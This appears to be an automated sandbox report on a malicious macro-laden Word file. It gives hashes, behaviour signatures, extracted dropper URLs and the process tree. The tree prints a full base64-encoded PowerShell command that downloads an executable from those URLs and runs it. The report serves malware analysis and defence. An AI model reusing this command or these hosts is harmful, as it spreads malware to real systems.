Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    11/06/2024, 06:00

General

  • Target

    9d3555fbc0790bcb137842edebf72fb8_JaffaCakes118.doc

  • Size

    178KB

  • MD5

    9d3555fbc0790bcb137842edebf72fb8

  • SHA1

    fa5aa3b117b2c36b3471eddd5859fdbf57b9ded1

  • SHA256

    b7ab0140593cce2c84d75526697a47affca87f3f9509235a1d0c1dfb70ea5ea8

  • SHA512

    aeb73f816d57b8624d7d430c19022352b6f35a8d8cbff4b481784a074df8942789cf5380977d4105d812b97ab50a948001b2d2d05a206f1da43f0b9608543897

  • SSDEEP

    3072:/77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qgKAvXXjXoIcq+eVuY3SW85r:/77HUUUUUUUUUUUUUUUUUUUT52VDvXDC

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://sukuntextile.com/wp_old/v_N/

exe.dropper

http://www.astoriadrycleaning.com.sg/wp-content/S_4v/

exe.dropper

http://d1mension-capitaland.vn/wp-admin/Dm_C/

exe.dropper

http://xn--80ajoksa8ap9b.xn--p1ai/administrator/r4_iG/

exe.dropper

http://e3consulting.co.me/blogs/e9_6/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9d3555fbc0790bcb137842edebf72fb8_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2176
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2264
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABkAHcAQQAxAEEAQQBBAEMAPQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnADQAdwAnACwAJwB3AEEAXwAnACwAJwBRACcAKQA7ACQAVwBCAF8AMQBCAFgAbwA9AE4AZQBgAHcAYAAtAG8AYgBgAEoAZQBDAHQAIAAoACcATgBlAHQALgBXAGUAJwArACcAYgAnACsAJwBDAGwAaQAnACsAJwBlAG4AJwArACcAdAAnACkAOwAkAGQAUQA0AEQANABRAFgAPQAoACIAewAyADcAfQB7ADIANQB9AHsAMwA0AH0AewAxADMAfQB7ADIAOAB9AHsAOQB9AHsAMgA2AH0AewAzAH0AewAyADQAfQB7ADEAMAB9AHsAMQA1AH0AewAxADIAfQB7ADEAMQB9AHsAMQA0AH0AewAxADYAfQB7ADEANwB9AHsAMgA5AH0AewAzADMAfQB7ADcAfQB7ADAAfQB7ADQAfQB7ADYAfQB7ADIAfQB7ADIAMQB9AHsAMwAwAH0AewAyADAAfQB7ADUAfQB7ADMAMQB9AHsAMgAyAH0AewAxADgAfQB7ADgAfQB7ADMAMgB9AHsAMQA5AH0AewAxAH0AewAyADMAfQAiACAALQBmACAAJwB0AHAAOgAvAC8AJwAsACcAYwBvAG4AcwB1AGwAdABpAG4AZwAuAGMAbwAuAG0AZQAvAGIAbABvAGcAcwAvACcALAAnADgAYQBwADkAYgAuAHgAbgAtAC0AcAAxAGEAaQAvAGEAJwAsACcAaAB0ACcALAAnAHgAJwAsACcAYQAnACwAJwBuAC0ALQA4ADAAYQBqAG8AawBzAGEAJwAsACcAaAB0ACcALAAnAF8AaQBHAC8AQABoAHQAdABwADoAJwAsACcAdgBfAE4AJwAsACcAbwByACcALAAnAF8ANAAnACwAJwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AUwAnACwAJwAuAGMAbwBtACcALAAnAHYALwBAAGgAdAB0AHAAOgAvAC8AZAAxACcALAAnAGkAYQBkAHIAeQBjAGwAZQBhAG4AaQBuAGcALgBjAG8AbQAuAHMAZwAvACcALAAnAG0AZQBuAHMAaQBvAG4ALQBjAGEAJwAsACcAcABpAHQAYQBsACcALAAnAHIALwByADQAJwAsACcAZQAzACcALAAnAHIAJwAsACcAZABtAGkAbgBpACcALAAnAG8AJwAsACcAZQA5AF8ANgAvACcALAAnAHQAcAA6AC8ALwB3AHcAdwAuAGEAcwB0ACcALAAnAHUAawAnACwAJwAvAEAAJwAsACcAaAB0AHQAcAA6AC8ALwBzACcALAAnAC8AdwBwAF8AbwBsAGQALwAnACwAJwBhAG4AZAAuACcALAAnAHMAdAAnACwAJwB0ACcALAAnAC8ALwAnACwAJwB2AG4ALwB3AHAALQBhAGQAbQBpAG4ALwBEAG0AXwBDAC8AQAAnACwAJwB1AG4AdABlAHgAdABpAGwAZQAnACkALgAiAFMAUABgAEwASQBUACIAKAAnAEAAJwApADsAJABhAEIAXwBBAFUAQgBaAEEAPQAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBwAEEAQQBBACcALAAnAEIAQgB3ACcAKQA7ACQAagBVAFUAQQBEAEEANABrACAAPQAgACcAMwA1ADEAJwA7ACQAcABBAEEAQQBrAG8AeAA9ACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAnAHcAWABvACcALAAnAHcAWgAnACwAJwBjAFEANAAnACkAOwAkAGQAQQBBADQAQQBDAGsAQgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAagBVAFUAQQBEAEEANABrACsAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwAuAGUAeAAnACwAJwBlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFAAQQBBAEEAQQBBACAAaQBuACAAJABkAFEANABEADQAUQBYACkAewB0AHIAeQB7ACQAVwBCAF8AMQBCAFgAbwAuACIARABPAFcATgBMAG8AYABBAGQAZgBgAEkAYABMAEUAIgAoACQAUABBAEEAQQBBAEEALAAgACQAZABBAEEANABBAEMAawBCACkAOwAkAFIAQQBBAF8AQgBBAFUAPQAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAQQBaAEEAJwAsACcAegBBAEIAJwApADsASQBmACAAKAAoAGcAZQB0AGAALQBpAGAAVABlAE0AIAAkAGQAQQBBADQAQQBDAGsAQgApAC4AIgBMAGUAYABOAGAARwB0AEgAIgAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AGkAbgB2AG8ASwBFAGAALQBgAEkAYABUAGUAbQAgACQAZABBAEEANABBAEMAawBCADsAJABqADEAQQBBAEIAQQBBAD0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAIAAnADQAQQAnACwAJwB3ACcALAAnAEEAeABYACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABVAEEAQQBHAEEAeABVAEcAPQAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAEEARABYAEEAdwAnACwAJwBOAEQAJwAsACcAUQAnACkAOwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2816

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            284a2aa639073d580a8f0a01768cced6

            SHA1

            bf59978a341048320221032cf1c7fe927afa254f

            SHA256

            2455795e063a31209c9df3424caee5601375efa562b7e2d79156e260885bf52c

            SHA512

            1151d9d516cd710acacc87665c5a490c749879e452d7ac5e8ece10155a4820054f164eff8d24ccf7dc20a5f4f805676b8a567ed7274f3bc086e8f6d11ccfbbe8

          • memory/2176-14-0x0000000006BC0000-0x0000000006CC0000-memory.dmp

            Filesize

            1024KB

          • memory/2176-2-0x0000000071A7D000-0x0000000071A88000-memory.dmp

            Filesize

            44KB

          • memory/2176-7-0x00000000006A0000-0x00000000007A0000-memory.dmp

            Filesize

            1024KB

          • memory/2176-12-0x00000000006A0000-0x00000000007A0000-memory.dmp

            Filesize

            1024KB

          • memory/2176-11-0x00000000006A0000-0x00000000007A0000-memory.dmp

            Filesize

            1024KB

          • memory/2176-13-0x00000000006A0000-0x00000000007A0000-memory.dmp

            Filesize

            1024KB

          • memory/2176-10-0x00000000006A0000-0x00000000007A0000-memory.dmp

            Filesize

            1024KB

          • memory/2176-9-0x00000000006A0000-0x00000000007A0000-memory.dmp

            Filesize

            1024KB

          • memory/2176-0-0x000000002FF41000-0x000000002FF42000-memory.dmp

            Filesize

            4KB

          • memory/2176-8-0x00000000006A0000-0x00000000007A0000-memory.dmp

            Filesize

            1024KB

          • memory/2176-27-0x00000000006A0000-0x00000000007A0000-memory.dmp

            Filesize

            1024KB

          • memory/2176-21-0x00000000006A0000-0x00000000007A0000-memory.dmp

            Filesize

            1024KB

          • memory/2176-15-0x00000000006A0000-0x00000000007A0000-memory.dmp

            Filesize

            1024KB

          • memory/2176-57-0x0000000071A7D000-0x0000000071A88000-memory.dmp

            Filesize

            44KB

          • memory/2176-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2176-39-0x0000000071A7D000-0x0000000071A88000-memory.dmp

            Filesize

            44KB

          • memory/2176-40-0x00000000006A0000-0x00000000007A0000-memory.dmp

            Filesize

            1024KB

          • memory/2176-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2816-33-0x000000001B720000-0x000000001BA02000-memory.dmp

            Filesize

            2.9MB

          • memory/2816-34-0x0000000001D80000-0x0000000001D88000-memory.dmp

            Filesize

            32KB